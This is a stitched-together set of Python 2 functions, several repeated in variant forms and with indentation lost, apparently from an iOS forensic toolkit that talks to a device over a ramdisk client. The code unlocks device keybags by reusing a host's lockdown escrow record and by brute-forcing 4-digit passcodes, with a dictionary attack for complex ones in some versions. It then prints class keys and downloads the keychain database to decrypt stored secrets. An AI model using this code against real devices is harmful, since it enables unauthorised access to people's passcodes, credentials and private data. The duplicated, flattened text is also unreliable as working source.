def escrow():
client = RamdiskToolClient()
di = client.getDeviceInfos()
key835 = di.get("key835").decode("hex")
plist = os.environ[
"ALLUSERSPROFILE"] + "/Apple/Lockdown/%s.plist" % di["udid"]
lockdown = plistlib.readPlist(plist)
kb = Keybag.createWithDataSignBlob(lockdown["EscrowBag"].data, key835)
keybags = di.setdefault("keybags", {})
kbuuid = kb.uuid.encode("hex")
if not keybags.has_key(kbuuid):
print lockdown["HostID"]
res = client.getEscrowRecord(lockdown["HostID"])
bagkey = res.get("BagKey")
print "Bag key" + bagkey.data.encode("hex")
res = client.getPasscodeKey(lockdown["EscrowBag"].data, bagkey)
print res
passcodeKey = res["passcodeKey"].decode("hex")
keybags[kbuuid] = {
"KeyBagKeys": lockdown["EscrowBag"],
"passcode": bagkey,
"passcodeKey": passcodeKey.encode("hex")
}
pl.update(keybags[kbuuid])
else:
passcodeKey = keybags[kbuuid].get("passcodeKey").decode("hex")
print kb.unlockWithPasscodeKey(passcodeKey)
kb.printClassKeys()
def escrow():
client = RamdiskToolClient()
di = client.getDeviceInfos()
key835 = di.get("key835").decode("hex")
plist = os.environ["ALLUSERSPROFILE"] + "/Apple/Lockdown/%s.plist" % di["udid"]
lockdown = plistlib.readPlist(plist)
kb = Keybag.createWithDataSignBlob(lockdown["EscrowBag"].data, key835)
keybags = di.setdefault("keybags", {})
kbuuid = kb.uuid.encode("hex")
if not keybags.has_key(kbuuid):
print lockdown["HostID"]
res = client.getEscrowRecord(lockdown["HostID"])
bagkey = res.get("BagKey")
print "Bag key" + bagkey.data.encode("hex")
res = client.getPasscodeKey(lockdown["EscrowBag"].data, bagkey)
print res
passcodeKey = res["passcodeKey"].decode("hex")
keybags[kbuuid] = {"KeyBagKeys": lockdown["EscrowBag"],
"passcode": bagkey,
"passcodeKey": passcodeKey.encode("hex")}
pl.update(keybags[kbuuid])
else:
passcodeKey = keybags[kbuuid].get("passcodeKey").decode("hex")
print kb.unlockWithPasscodeKey(passcodeKey)
kb.printClassKeys()
def __init__(self, image, completekey='tab', stdin=None, stdout=None):
Cmd.__init__(self, completekey=completekey, stdin=stdin, stdout=stdout)
self.curdir = "/"
self.rdisk = None
if image.filename == "remote":
self.rdisk = RamdiskToolClient.get()
self.device_infos = image.device_infos
self.complete_open = self._complete
self.complete_xattr = self._complete
self.complete_cprotect = self._complete
self.complete_ls = self._complete
self.complete_cd = self._complete
self.complete_plist = self._complete
self.complete_xxd = self._complete
self.image = image
if image.ppn and image.filename == "remote":
self.savepath = "."
print "Remote PPN device, use nand_dump + save, other commands will fail"
return
self.system = image.getPartitionVolume(0)
self.data = image.getPartitionVolume(1)
self.volume = None
self.volname = ""
grab_system_version(self.system, self.device_infos)
print "Keybag state: %slocked" % (int(self.data.keybag.unlocked) * "un")
self.deviceName = get_device_name(self.data)
self.do_data("")
self.savepath = os.path.join(os.path.dirname(image.filename), "%s.plist" % self.device_infos.udid[:10])
#if image.iosVersion > 3 and not image.device_infos.has_key("passcode"):
# print "No passcode found in plist file, bruteforce required to access protected data"
self.carver = None
def main():
parser = OptionParser(usage="%prog [options] nand_image.bin device_infos.plist")
(options, args) = parser.parse_args()
if sys.platform == "darwin":
import readline
import rlcompleter
#fix tab complete on osx
if readline.__doc__ and "libedit" in readline.__doc__:
readline.parse_and_bind("bind ^I rl_complete")
else:
readline.parse_and_bind("tab: complete")
if len(args) >= 2:
plistname = args[1]
nandimagename = args[0]
device_infos = plistlib.readPlist(plistname)
print "Loading device information from %s" % plistname
else:
nandimagename ="remote"
client = RamdiskToolClient.get()
device_infos = client.device_infos
print_device_infos(device_infos)
image = NAND(nandimagename, device_infos)
ExaminerShell(image).cmdloop("")
def bruteforcePasscode(device_infos, data_volume):
if device_infos.has_key("passcode"):
print "Passcode already found, no bruteforce required"
return False
kb = data_volume.keybag
if not kb:
return False
rd = RamdiskToolClient.get()
if rd.device_infos.udid != device_infos.udid:
print "Wrong device connected"
return
print "Enter passcode or leave blank for bruteforce:"
z = raw_input()
bf = rd.getPasscodeKey(kb.KeyBagKeys, z)
if kb.unlockWithPasscodeKey(bf.get("passcodeKey").decode("hex")):
print "Passcode \"%s\" OK" % z
else:
if z != "":
print "Wrong passcode, trying to bruteforce !"
if checkPasscodeComplexity(data_volume) != 0:
print "Complex passcode used, not bruteforcing"
return False
bf = rd.bruteforceKeyBag(kb.KeyBagKeys)
if bf and kb.unlockWithPasscodeKey(bf.get("passcodeKey").decode("hex")):
print "Bruteforce successful, passcode : %s" % bf["passcode"]
print "Passcode key : %s" % bf.get("passcodeKey")
if kb.unlocked:
device_infos.update(bf)
device_infos["classKeys"] = kb.getClearClassKeysDict()
device_infos["KeyBagKeys"] = plistlib.Data(kb.KeyBagKeys)
return True
return False
def bf_system():
client = RamdiskToolClient()
di = client.getDeviceInfos()
devicedir = di["udid"]
if os.getcwd().find(devicedir) == -1:
try:
os.mkdir(devicedir)
except:
pass
os.chdir(devicedir)
key835 = di.get("key835").decode("hex")
systembag = client.getSystemKeyBag()
kbkeys = systembag["KeyBagKeys"].data
kb = Keybag.createWithDataSignBlob(kbkeys, key835)
keybags = di.setdefault("keybags", {})
kbuuid = kb.uuid.encode("hex")
print "Keybag UUID :", kbuuid
if True and keybags.has_key(kbuuid) and keybags[kbuuid].has_key("passcodeKey"):
print "We've already seen this keybag"
passcodeKey = keybags[kbuuid].get("passcodeKey").decode("hex")
print kb.unlockWithPasscodeKey(passcodeKey)
kb.printClassKeys()
else:
keybags[kbuuid] = {"KeyBagKeys": systembag["KeyBagKeys"]}
di["KeyBagKeys"] = systembag["KeyBagKeys"]
di.save()
print "Enter passcode or leave blank for bruteforce:"
z = raw_input()
res = client.getPasscodeKey(systembag["KeyBagKeys"].data, z)
if kb.unlockWithPasscodeKey(res.get("passcodeKey").decode("hex")):
print "Passcode \"%s\" OK" % z
di.update(res)
keybags[kbuuid].update(res)
di.save()
keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
write_file("keychain-2.db", keychain_blob)
print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
return
if z != "":
print "Wrong passcode, trying to bruteforce !"
if checkPasscodeComplexity(client) == 0:
print "Trying all 4-digits passcodes..."
bf = client.bruteforceKeyBag(systembag["KeyBagKeys"].data)
if bf:
di.update(bf)
keybags[kbuuid].update(bf)
print bf
print kb.unlockWithPasscodeKey(bf.get("passcodeKey").decode("hex"))
kb.printClassKeys()
di["classKeys"] = kb.getClearClassKeysDict()
di.save()
else:
print "Complex passcode used !"
return
#keychain_blob = client.downloadFile("/private/var/Keychains/keychain-2.db")
keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
write_file("keychain-2.db", keychain_blob)
print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
def decryptGID(data):
try:
client = RamdiskToolClient.get()
except:
return None
r = client.aesGID(data)
if r and r.has_key("data"):
return r.data.data
return None
def decryptGID(data):
try:
client = RamdiskToolClient.get()
except:
return None
r = client.aesGID(data)
if r and r.has_key("data"):
return r.data.data
return None
def main():
parser = OptionParser(usage="%prog [options] nand_image.bin device_infos.plist")
(options, args) = parser.parse_args()
if len(args) >= 2:
plistname = args[1]
nandimagename = args[0]
device_infos = plistlib.readPlist(plistname)
print "Loading device information from %s" % plistname
else:
nandimagename ="remote"
client = RamdiskToolClient.get()
device_infos = client.device_infos
print_device_infos(device_infos)
image = NAND(nandimagename, device_infos)
ExaminerShell(image).cmdloop("")
def main():
parser = OptionParser(
usage="%prog [options] nand_image.bin device_infos.plist")
(options, args) = parser.parse_args()
if len(args) >= 2:
plistname = args[1]
nandimagename = args[0]
device_infos = plistlib.readPlist(plistname)
print "Loading device information from %s" % plistname
else:
nandimagename = "remote"
client = RamdiskToolClient.get()
device_infos = client.device_infos
print_device_infos(device_infos)
image = NAND(nandimagename, device_infos)
ExaminerShell(image).cmdloop("")
def bf_system():
client = RamdiskToolClient()
di = client.getDeviceInfos()
devicedir = di["udid"]
if os.getcwd().find(devicedir) == -1:
try:
os.mkdir(devicedir)
except:
pass
os.chdir(devicedir)
key835 = di.get("key835").decode("hex")
systembag = client.getSystemKeyBag()
kbkeys = systembag["KeyBagKeys"].data
kb = Keybag.createWithDataSignBlob(kbkeys, key835)
keybags = di.setdefault("keybags", {})
kbuuid = kb.uuid.encode("hex")
print "Keybag UUID :", kbuuid
if True and keybags.has_key(kbuuid) and keybags[kbuuid].has_key(
"passcodeKey"):
print "We've already seen this keybag"
passcodeKey = keybags[kbuuid].get("passcodeKey").decode("hex")
print kb.unlockWithPasscodeKey(passcodeKey)
kb.printClassKeys()
else:
keybags[kbuuid] = {"KeyBagKeys": systembag["KeyBagKeys"]}
di["KeyBagKeys"] = systembag["KeyBagKeys"]
di.save()
if checkPasscodeComplexity(client) == 0:
print "Trying all 4-digits passcodes..."
bf = client.bruteforceKeyBag(systembag["KeyBagKeys"].data)
if bf:
di.update(bf)
keybags[kbuuid].update(bf)
print bf
print kb.unlockWithPasscodeKey(bf.get("passcodeKey").decode("hex"))
kb.printClassKeys()
di["classKeys"] = kb.getClearClassKeysDict()
di.save()
else:
print "Complex passcode used !"
return
#keychain_blob = client.downloadFile("/private/var/Keychains/keychain-2.db")
keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
write_file("keychain-2.db", keychain_blob)
print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
def bruteforcePasscode(device_infos, data_volume):
if device_infos.has_key("passcode"):
print "Passcode already found, no bruteforce required"
return False
kb = data_volume.keybag
if not kb:
return False
rd = RamdiskToolClient.get()
if rd.device_infos.udid != device_infos.udid:
print "Wrong device connected"
return
print "Passcode comlexity (from OpaqueStuff) : %s" % COMPLEXITY.get(kb.passcodeComplexity)
print "Enter passcode or leave blank for bruteforce:"
z = raw_input()
bf = rd.getPasscodeKey(kb.KeyBagKeys, z)
if kb.unlockWithPasscodeKey(bf.get("passcodeKey").decode("hex")):
print "Passcode \"%s\" OK" % z
else:
if z != "":
print "Wrong passcode, trying to bruteforce !"
if kb.passcodeComplexity != 0:
print "Complex passcode used, not bruteforcing"
return False
bf = rd.bruteforceKeyBag(kb.KeyBagKeys)
if bf and kb.unlockWithPasscodeKey(bf.get("passcodeKey").decode("hex")):
print "Bruteforce successful, passcode : %s" % bf["passcode"]
print "Passcode key : %s" % bf.get("passcodeKey")
if kb.unlocked:
device_infos.update(bf)
device_infos["classKeys"] = kb.getClearClassKeysDict()
device_infos["KeyBagKeys"] = plistlib.Data(kb.KeyBagKeys)
return True
return False
def bf_system():
curdir = os.path.dirname(os.path.abspath(__file__))
client = RamdiskToolClient()
di = client.getDeviceInfos()
devicedir = di["udid"]
if os.getcwd().find(devicedir) == -1:
try:
os.mkdir(devicedir)
except:
pass
os.chdir(devicedir)
key835 = di.get("key835").decode("hex")
systembag = client.getSystemKeyBag()
kbkeys = systembag["KeyBagKeys"].data
kb = Keybag.createWithDataSignBlob(kbkeys, key835)
keybags = di.setdefault("keybags", {})
kbuuid = kb.uuid.encode("hex")
print "Keybag UUID :", kbuuid
if True and keybags.has_key(kbuuid) and keybags[kbuuid].has_key("passcodeKey"):
print "We've already seen this keybag"
passcodeKey = keybags[kbuuid].get("passcodeKey").decode("hex")
print kb.unlockWithPasscodeKey(passcodeKey)
kb.printClassKeys()
else:
keybags[kbuuid] = {"KeyBagKeys": systembag["KeyBagKeys"]}
di["KeyBagKeys"] = systembag["KeyBagKeys"]
di.save()
print "Enter passcode or leave blank for bruteforce:"
z = raw_input()
res = client.getPasscodeKey(systembag["KeyBagKeys"].data, z)
if kb.unlockWithPasscodeKey(res.get("passcodeKey").decode("hex")):
print 'Passcode "%s" OK' % z
di.update(res)
keybags[kbuuid].update(res)
di.save()
keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
write_file("keychain-2.db", keychain_blob)
# to fix the keychain downloading on iOS 7
keychain_shm = client.downloadFile("/mnt2/Keychains/keychain-2.db-shm")
write_file("keychain-2.db-shm", keychain_shm)
keychain_wal = client.downloadFile("/mnt2/Keychains/keychain-2.db-wal")
write_file("keychain-2.db-wal", keychain_wal)
print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
return
if z != "":
print "Wrong passcode, trying to bruteforce !"
if kb.passcodeComplexity == 0:
print "Trying all 4-digits passcodes..."
bf = client.bruteforceKeyBag(systembag["KeyBagKeys"].data)
if bf:
di.update(bf)
keybags[kbuuid].update(bf)
print bf
print kb.unlockWithPasscodeKey(bf.get("passcodeKey").decode("hex"))
kb.printClassKeys()
di["classKeys"] = kb.getClearClassKeysDict()
di.save()
else:
print "Complex passcode used, trying dictionary attack ..."
dictfile = os.path.join(curdir, "wordlist.dict")
try:
wordlist = open(dictfile, "r").readlines()
except (OSError, IOError), e:
exit(e)
for line in wordlist:
res = client.getPasscodeKey(systembag["KeyBagKeys"].data, line.rstrip("\n"))
if kb.unlockWithPasscodeKey(res.get("passcodeKey").decode("hex")):
print 'Passcode "%s" OK' % line.rstrip("\n")
di.update(res)
keybags[kbuuid].update(res)
di.save()
keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
write_file("keychain-2.db", keychain_blob)
# to fix the keychain downloading on iOS 7
keychain_shm = client.downloadFile("/mnt2/Keychains/keychain-2.db-shm")
write_file("keychain-2.db-shm", keychain_shm)
keychain_wal = client.downloadFile("/mnt2/Keychains/keychain-2.db-wal")
write_file("keychain-2.db-wal", keychain_wal)
print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
return
print "Passcode not found!"
return
def do_reboot(self, p):
if not self.rdisk:
self.rdisk = RamdiskToolClient.get()
self.rdisk.reboot()
return self.do_exit(p)
def bf_system():
curdir = os.path.dirname(os.path.abspath(__file__))
client = RamdiskToolClient()
di = client.getDeviceInfos()
devicedir = di["udid"]
if os.getcwd().find(devicedir) == -1:
try:
os.mkdir(devicedir)
except:
pass
os.chdir(devicedir)
key835 = di.get("key835").decode("hex")
systembag = client.getSystemKeyBag()
kbkeys = systembag["KeyBagKeys"].data
kb = Keybag.createWithDataSignBlob(kbkeys, key835)
keybags = di.setdefault("keybags", {})
kbuuid = kb.uuid.encode("hex")
print "Keybag UUID :", kbuuid
if True and keybags.has_key(kbuuid) and keybags[kbuuid].has_key(
"passcodeKey"):
print "We've already seen this keybag"
passcodeKey = keybags[kbuuid].get("passcodeKey").decode("hex")
print kb.unlockWithPasscodeKey(passcodeKey)
kb.printClassKeys()
else:
keybags[kbuuid] = {"KeyBagKeys": systembag["KeyBagKeys"]}
di["KeyBagKeys"] = systembag["KeyBagKeys"]
di.save()
print "Enter passcode or leave blank for bruteforce:"
z = raw_input()
res = client.getPasscodeKey(systembag["KeyBagKeys"].data, z)
if kb.unlockWithPasscodeKey(res.get("passcodeKey").decode("hex")):
print "Passcode \"%s\" OK" % z
di.update(res)
keybags[kbuuid].update(res)
di.save()
keychain_blob = client.downloadFile(
"/mnt2/Keychains/keychain-2.db")
write_file("keychain-2.db", keychain_blob)
print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
return
if z != "":
print "Wrong passcode, trying to bruteforce !"
if checkPasscodeComplexity(client) == 0:
print "Trying all 4-digits passcodes..."
bf = client.bruteforceKeyBag(systembag["KeyBagKeys"].data)
if bf:
di.update(bf)
keybags[kbuuid].update(bf)
print bf
print kb.unlockWithPasscodeKey(bf.get("passcodeKey").decode("hex"))
kb.printClassKeys()
di["classKeys"] = kb.getClearClassKeysDict()
di.save()
else:
print "Complex passcode used, trying dictionary attack ..."
dictfile = os.path.join(curdir, 'wordlist.dict')
try:
wordlist = open(dictfile, 'r').readlines()
except (OSError, IOError), e:
exit(e)
for line in wordlist:
res = client.getPasscodeKey(systembag["KeyBagKeys"].data,
line.rstrip('\n'))
if kb.unlockWithPasscodeKey(
res.get("passcodeKey").decode("hex")):
print "Passcode \"%s\" OK" % line.rstrip('\n')
di.update(res)
keybags[kbuuid].update(res)
di.save()
keychain_blob = client.downloadFile(
"/mnt2/Keychains/keychain-2.db")
write_file("keychain-2.db", keychain_blob)
print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
return
print "Passcode not found!"
return
